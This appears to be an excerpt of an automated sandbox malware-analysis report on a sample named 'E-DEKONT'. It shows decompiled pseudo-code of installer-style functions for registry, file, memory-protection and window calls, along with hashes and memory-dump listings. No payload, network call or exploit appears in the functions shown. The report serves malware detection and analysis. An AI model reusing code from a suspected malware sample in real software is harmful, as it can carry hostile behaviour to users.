                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointerwsprintf
                                                                            • String ID:
                                                                            • API String ID: 327478801-0
                                                                            • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                                            • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                                            • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                                            • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                            0x00402306
                                                                            0x00402306
                                                                            0x00402308
                                                                            0x0040230c
                                                                            0x0040230f
                                                                            0x00402314
                                                                            0x00402319
                                                                            0x00402322
                                                                            0x00402322
                                                                            0x00402327
                                                                            0x00402330
                                                                            0x00402330
                                                                            0x0040233d
                                                                            0x004015b4
                                                                            0x004015b6
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                            • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                            • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                            • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040611D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406074(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                            0x00406127
                                                                            0x00406130
                                                                            0x00406146
                                                                            0x00000000
                                                                            0x00406146
                                                                            0x00406134
                                                                            0x00000000

                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                            • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                            • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405E26(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x00405e2a
                                                                            0x00405e3a
                                                                            0x00405e42
                                                                            0x00000000
                                                                            0x00405e49
                                                                            0x00000000
                                                                            0x00405e4b

                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                            • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                            • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405DF7(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x00405dfb
                                                                            0x00405e0b
                                                                            0x00405e13
                                                                            0x00000000
                                                                            0x00405e1a
                                                                            0x00000000
                                                                            0x00405e1c

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                            • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                            • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                                            0x100027cb
                                                                            0x100027d0
                                                                            0x100027e0
                                                                            0x100027e8
                                                                            0x100027ef
                                                                            0x100027f4
                                                                            0x100027f9
                                                                            0x100027fe
                                                                            0x10002803
                                                                            0x10002808
                                                                            0x1000280d
                                                                            0x1000280d
                                                                            0x10002815

                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                            • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                            • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004060EF(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406074(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                            0x004060f9
                                                                            0x00406100
                                                                            0x00406113
                                                                            0x00000000
                                                                            0x00406113
                                                                            0x00406104
                                                                            0x00000000

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                            • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                            • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                            0x004015ae
                                                                            0x004015b4
                                                                            0x004015b6
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: b47b1cd7a6160306081e6e292560e2a86c9e88a18a2e4b9c46391c7bd3c76fa1
                                                                            • Instruction ID: 18b2471a241adc9bf36c7ea4c0146ff71e49c13b27122dc007abb7967bce33ea
                                                                            • Opcode Fuzzy Hash: b47b1cd7a6160306081e6e292560e2a86c9e88a18a2e4b9c46391c7bd3c76fa1
                                                                            • Instruction Fuzzy Hash: ECD01272B04104DBDB11DBA4AF0859D72A59B50364B214577E101F11D1DAB989449A19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040424C(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434ee8, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                            0x0040425a
                                                                            0x00404260

                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                            • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                            • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                            • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040332B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                            0x00403339
                                                                            0x0040333f

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052E6(0xffffffeb, _t7);
				_t9 = E00405867(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E0040670D(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061C9( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                            0x00401f06
                                                                            0x00401f0b
                                                                            0x00401f11
                                                                            0x00401f16
                                                                            0x00401f1a
                                                                            0x00402885
                                                                            0x00401f20
                                                                            0x00401f23
                                                                            0x00401f26
                                                                            0x00401f2e
                                                                            0x00401f3d
                                                                            0x00401f3f
                                                                            0x00401f3f
                                                                            0x00401f30
                                                                            0x00401f34
                                                                            0x00401f34
                                                                            0x00401f2e
                                                                            0x00401f46
                                                                            0x00401f47
                                                                            0x00401f47
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                              • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                              • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
